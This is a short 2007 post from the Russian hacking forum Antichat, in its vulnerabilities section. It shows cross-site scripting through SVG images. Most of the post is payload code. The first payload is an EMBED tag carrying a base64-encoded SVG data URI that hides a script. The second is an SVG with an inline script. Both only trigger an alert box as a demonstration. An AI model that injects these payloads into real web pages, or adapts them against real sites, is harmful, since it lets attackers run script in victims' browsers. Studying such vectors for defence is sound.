Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS in Scalable Vector Graphics(SVG) (https://forum.antichat.xyz/showthread.php?t=33710)

ettee 19.02.2007 18:20
XSS in Scalable Vector Graphics(SVG)
 
Формат является открытым стандартом, который основан на языке XML, SVG формат объединяет в себе графические данные, текст и интерактивные компоненты. Подержка браузеров и производителей графического ПО.
Cайте формата http://www.w3.org/Graphics/SVG
thx nEUrOO за первую демонстрацию.

Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://img512.imageshack.us/img512/4...titled1ra0.jpg

Код:
<svg
...

<script>
  <![CDATA[
        alert("XSS");
  ]]>
  </script>
</svg>
Пример


Время: 17:05